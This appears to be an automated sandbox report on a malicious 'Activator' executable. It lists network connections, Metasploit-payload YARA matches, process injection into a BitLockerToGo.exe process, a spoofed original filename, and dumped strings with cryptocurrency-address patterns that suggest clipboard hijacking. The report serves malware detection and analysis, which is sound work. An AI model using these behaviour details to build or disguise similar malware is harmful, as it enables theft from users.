    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.42.210:443 -> 192.168.2.6:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49755 version: TLS 1.2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00438BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00438BD0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00438BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00438BD0
    Source: duser.dll.0.drBinary or memory string: DirectDrawCreateExmemstr_91e8b9e7-a

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: 00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0569C0_2_00007FF7E5F0569C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1400C0_2_00007FF7E5F1400C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EFA8AC0_2_00007FF7E5EFA8AC
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F062940_2_00007FF7E5F06294
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0ECE00_2_00007FF7E5F0ECE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F109D80_2_00007FF7E5F109D8
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EFDC4C0_2_00007FF7E5EFDC4C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EFBF0C0_2_00007FF7E5EFBF0C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F22F240_2_00007FF7E5F22F24
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F290080_2_00007FF7E5F29008
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1C0740_2_00007FF7E5F1C074
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1FD180_2_00007FF7E5F1FD18
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1BDF80_2_00007FF7E5F1BDF8
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EF72AC0_2_00007FF7E5EF72AC
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EFB9480_2_00007FF7E5EFB948
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F255100_2_00007FF7E5F25510
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EFE91C0_2_00007FF7E5EFE91C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1400C0_2_00007FF7E5F1400C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F259E00_2_00007FF7E5F259E0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0CA300_2_00007FF7E5F0CA30
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EFB3180_2_00007FF7E5EFB318
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004101F03_2_004101F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040FBA03_2_0040FBA0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004010003_2_00401000
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040B0103_2_0040B010
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004070103_2_00407010
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0044A0203_2_0044A020
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004110F03_2_004110F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0044814A3_2_0044814A
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004491503_2_00449150
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F1803_2_0043F180
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004052503_2_00405250
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004452303_2_00445230
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004273503_2_00427350
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040135B3_2_0040135B
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040131C3_2_0040131C
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042B3253_2_0042B325
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0044033D3_2_0044033D
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004073E03_2_004073E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004104CA3_2_004104CA
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040B4A03_2_0040B4A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040A4A03_2_0040A4A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004285563_2_00428556
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0044A5703_2_0044A570
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004095EA3_2_004095EA
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004035F03_2_004035F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004496303_2_00449630
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0044B7503_2_0044B750
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004087C03_2_004087C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004337C23_2_004337C2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D7923_2_0041D792
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004368D03_2_004368D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004108F73_2_004108F7
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040A9603_2_0040A960
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004109203_2_00410920
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004389903_2_00438990
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0044BA203_2_0044BA20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042BB403_2_0042BB40
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042BB203_2_0042BB20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00426BDA3_2_00426BDA
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042ABBC3_2_0042ABBC
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00449C703_2_00449C70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040CCD03_2_0040CCD0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00432DD33_2_00432DD3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00407E203_2_00407E20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00449E903_2_00449E90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040BFB03_2_0040BFB0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042CFBC3_2_0042CFBC
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040CAE0 appears 59 times
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0041D140 appears 167 times
    Source: Activator by URKE v2.5.exe, 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameASUSSmartDisplayControl.exeV vs Activator by URKE v2.5.exe
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameASUSSmartDisplayControl.exeV vs Activator by URKE v2.5.exe
    Source: 00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: drvstore.dllBinary string: System32\DriverStoreSystem32\configDRIVERSSYSTEM\Device\DeviceApi\CMApi@%ws:%wsSoftwareSystem\Microsoft\Windows\CurrentVersion\WINEVTSYSTEM\CurrentControlSet\Control\WMI\SecuritySYSTEM\CurrentControlSet\Control\WMI\AutoLoggerbcrypt.dllCRYPT32.dllWINTRUST.dllRPCRT4.dllapi-ms-win-core-registry-l1-1-0.dllapi-ms-win-security-base-l1-1-0.dllapi-ms-win-service-management-l2-1-0.dllapi-ms-win-service-winsvc-l1-1-0.dllapi-ms-win-service-management-l1-1-0.dllapi-ms-win-security-sddl-l1-1-0.dllapi-ms-win-core-version-l1-1-0.dllapi-ms-win-security-provider-l1-1-0.dllapi-ms-win-security-cryptoapi-l1-1-0.dllapi-ms-win-core-registry-l2-1-0.dllbad allocationpermission deniedfile existsno such devicefilename too longdevice or resource busyio errordirectory not emptyinvalid argumentno space on deviceno such file or directoryfunction not supportedno lock availablenot enough memoryresource unavailable try againcross device linkoperation canceledtoo many files openpermission_deniedaddress_in_useaddress_not_availableaddress_family_not_supportedconnection_already_in_progressbad_file_descriptorconnection_abortedconnection_refusedconnection_resetdestination_address_requiredbad_addresshost_unreachableoperation_in_progressinterruptedinvalid_argumentalready_connectedtoo_many_files_openmessage_sizefilename_too_longnetwork_downnetwork_resetnetwork_unreachableno_buffer_spaceno_protocol_optionnot_connectednot_a_socketoperation_not_supportedprotocol_not_supportedwrong_protocol_typetimed_outoperation_would_blockaddress family not supportedaddress in useaddress not availablealready connectedargument list too longargument out of domainbad addressbad file descriptorbad messagebroken pipeconnection abortedconnection already in progressconnection refusedconnection resetdestination address requiredexecutable format errorfile too largehost unreachableidentifier removedillegal byte sequenceinappropriate io control operationinvalid seekis a directorymessage sizenetwork downnetwork resetnetwork unreachableno buffer spaceno child processno linkno message availableno messageno protocol optionno stream resourcesno such device or addressno such processnot a directorynot a socketnot a streamnot connectednot supportedoperation in progressoperation not permittedoperation not supportedoperation would blockowner deadprotocol errorprotocol not supportedread only file systemresource deadlock would occurresult out of rangestate not recoverablestream timeouttext file busytimed outtoo many files open in systemtoo many linkstoo many symbolic link levelsvalue too largewrong protocol type"
    Source: classification engineClassification label: mal100.troj.evad.winEXE@22/30@27/10
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EF3BF8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF7E5EF3BF8
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043820F CoCreateInstance,3_2_0043820F
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0C260 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF7E5F0C260
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
    Source: Activator by URKE v2.5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile read: C:\Windows\win.iniJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Activator by URKE v2.5.exeReversingLabs: Detection: 47%
    Source: n3.exeString found in binary or memory: %%%% to your LaTeX documentsfnt: invalid location data^BC1[02-9AC-HJ-NP-Z]{7,76}$^bc1[02-9ac-hj-np-z]{7,76}$^(?:[^%]|%[0-9A-Fa-f]{2})*$^00[679]\d{2}([ \-]\d{4})?$expand slice: cannot changeinvalid struct key type: %v in action started at %s:%d{{break}} outside {{range}}too many declarations in %sinvalid type for comparisoncan't index item of type %scan't slice item of type %s%v %v is already registeredinvalid P224 point encodinginvalid P256 point encodinginvalid P384 point encodinginvalid P521 point encodingtiff: unsupported feature: BitsPerSample must not be 0/FirstChar 32 /LastChar 255/PageLayout /TwoColumnRightscale factor cannot be zero/BBox [%.2f %.2f %.2f %.2f]/Matrix [1 0 0 1 %.5f %.5f]font_embed/helveticabi.jsonapplication/gzip-compressedapplication/x-7z-compressedapplication/x-installshieldapplication/pkcs7-signaturegif: reading image data: %vinvalid character <<%c>> %sfile descriptor in bad statedestination address requiredprotocol driver not attachedCertCreateCertificateContextunrecognized PE machine: %#xCanada Central Standard TimeCen. Australia Standard TimeAus Central W. Standard TimeCentral Europe Standard TimeEnglish name for time zone "GUILD_AUDIT_LOG_ENTRY_CREATEGUILD_SCHEDULED_EVENT_CREATEGUILD_SCHEDULED_EVENT_DELETEGUILD_SCHEDULED_EVENT_UPDATEno VoiceConnection websocketOP2 unmarshall error, %s, %sOP4 unmarshall error, %s, %sOP5 unmarshall error, %s, %s^(?:[-+]?(?:0|[1-9][0-9]*))$^runelength\((\d+)\|(\d+)\)$os: process already finishedGetFileInformationByHandleExWPUCompleteOverlappedRequestRISC-V 128-bit address spaceInvalid rich header checksumerrors: target cannot be nilcomparing uncomparable type region exceeds uintptr rangeneed padding in bucket (key)/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignal
    Source: n3.exeString found in binary or memory: vgsvg: w and h must both be > 0sfnt: invalid glyph data length^(([a-zA-Z0-9/_|\-=+]{1,})|\*)$maximum decoding depth exceededunterminated character constantmissing argument for comparisonvalue has type %s; should be %swrong number of samples for RGBincorrect zoom display mode: %s/Dest [%d 0 R /XYZ 0 %.2f null]<</Type /Outlines /First %d 0 Rcould not close zlib writer: %wapplication/x-windows-installergif: unknown block type: 0x%.2xca-ES-valencia en-US-u-va-posixresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyfail to seek to string table: %vfail to seek to symbol table: %v: day-of-year does not match dayAUTO_MODERATION_ACTION_EXECUTIONApplicationCommandOptionType(%d)error closing udp connection, %serror opening udp connection, %s^[0-9a-f]{14}$|^\d{15}$|^\d{18}$crypto/aes: input not full blockWSAGetServiceClassNameByClassIdAWSAGetServiceClassNameByClassIdW!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~sync: Unlock of unlocked RWMutexsync: negative WaitGroup counterslice bounds out of range [::%x]slice bounds out of range [:%x:]slice bounds out of range [%x::] (types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned28421709430404007434844970703125reflect: NumIn of non-func type reflect.MapOf: invalid key type MapIter.Value called before Nextreflect.Value.Grow: negative lenABCDEFGHIJKLMNOPQRSTUVWXYZ2345670123456789ABCDEFGHIJKLMNOPQRSTUVbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full bufferframe_windowupdate_zero_inc_connaccess-control-allow-credentialsuse of closed network connectionread limit of %d bytes exhaustedin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')websocket: invalid control frameproxy: got unknown address type ed25519: bad public key length: total sampling factors too largego package net: hostLookupOrder(x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurechacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largeinteger is not minimally encodedcannot represent time as UTCTimeinvalid quoted key in build linebuild line missing '=' after keyunquoted value %q must be quotedhttps:/
    Source: n3.exeString found in binary or memory: vgsvg: w and h must both be > 0sfnt: invalid glyph data length^(([a-zA-Z0-9/_|\-=+]{1,})|\*)$maximum decoding depth exceededunterminated character constantmissing argument for comparisonvalue has type %s; should be %swrong number of samples for RGBincorrect zoom display mode: %s/Dest [%d 0 R /XYZ 0 %.2f null]<</Type /Outlines /First %d 0 Rcould not close zlib writer: %wapplication/x-windows-installergif: unknown block type: 0x%.2xca-ES-valencia en-US-u-va-posixresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyfail to seek to string table: %vfail to seek to symbol table: %v: day-of-year does not match dayAUTO_MODERATION_ACTION_EXECUTIONApplicationCommandOptionType(%d)error closing udp connection, %serror opening udp connection, %s^[0-9a-f]{14}$|^\d{15}$|^\d{18}$crypto/aes: input not full blockWSAGetServiceClassNameByClassIdAWSAGetServiceClassNameByClassIdW!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~sync: Unlock of unlocked RWMutexsync: negative WaitGroup counterslice bounds out of range [::%x]slice bounds out of range [:%x:]slice bounds out of range [%x::] (types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned28421709430404007434844970703125reflect: NumIn of non-func type reflect.MapOf: invalid key type MapIter.Value called before Nextreflect.Value.Grow: negative lenABCDEFGHIJKLMNOPQRSTUVWXYZ2345670123456789ABCDEFGHIJKLMNOPQRSTUVbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full bufferframe_windowupdate_zero_inc_connaccess-control-allow-credentialsuse of closed network connectionread limit of %d bytes exhaustedin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')websocket: invalid control frameproxy: got unknown address type ed25519: bad public key length: total sampling factors too largego package net: hostLookupOrder(x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurechacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largeinteger is not minimally encodedcannot represent time as UTCTimeinvalid quoted key in build linebuild line missing '=' after keyunquoted value %q must be quotedhttps:/
    Source: n3.exeString found in binary or memory: 0-9a-zA-Z]locale not found when calling %s: %vcrypto/cipher: input not full blocksstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
    Source: n3.exeString found in binary or memory: 0-9a-zA-Z]locale not found when calling %s: %vcrypto/cipher: input not full blocksstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
    Source: n3.exeString found in binary or memory: Estimated total CPU time spent performing GC tasks on processors (as defined by GOMAXPROCS) dedicated to those tasks. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent running user Go code. This may also include some small amount of time spent in the Go runtime. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time goroutines spent performing GC tasks to assist the GC and prevent it from falling behind the application. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent returning unused memory to the underlying platform in response eagerly in response to memory pressure. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.^rgb\(\s*(?:(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])|(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%)\s*\)$Estimated total CPU time spent performing tasks that return unused memory to the underlying platform. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics. Sum of all metrics in /cpu/classes/scavenge.Count of small allocations that are packed together into blocks. These allocations are counted separately from other allocations because each individual allocation is not tracked by the runtime, only their block. Each block is already accounted for in allocs-by-size and frees-by-size.Approximate cumulative time goroutines have spent blocked on a sync.Mutex, 